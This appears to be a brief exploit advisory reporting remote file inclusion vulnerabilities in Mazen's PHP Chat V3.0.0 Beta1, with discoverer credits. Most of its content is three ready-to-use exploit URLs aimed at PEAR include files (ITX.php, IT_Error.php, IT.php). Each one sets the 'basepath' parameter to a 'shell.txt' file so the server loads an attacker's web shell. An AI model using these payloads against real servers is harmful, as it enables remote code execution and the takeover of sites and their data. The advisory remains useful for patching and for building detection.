Mazens PHP Chat version 3 suffers from remote file inclusion vulnerabilities.
7d61cfcf8d72b2e694f9f0b79ca88c3bb695f9d0b9e966fb8b29f880002a4d8f
#Mazen's PHP Chat V3.0.0 Beta1 Remote file inclusion
#Download script : http://www.scriptbrasil.com.br/script/php/bate_papo/mazen_phpopenchmt221.tar.gz
#Thanks Str0ke :D
#Exploit :
#http://victim.com/[chat_path]/include/pear/ITX.php?basepath=shell.txt?
#http://victim.com/[chat_path]/include/pear/IT_Error.php?basepath=shell.txt?
#http://victim.com/[chat_path]/include/pear/IT.php?basepath= shell.txt?
#Discovered by ThE TiGeR
#Miro_Tiger[at]Hotmail.com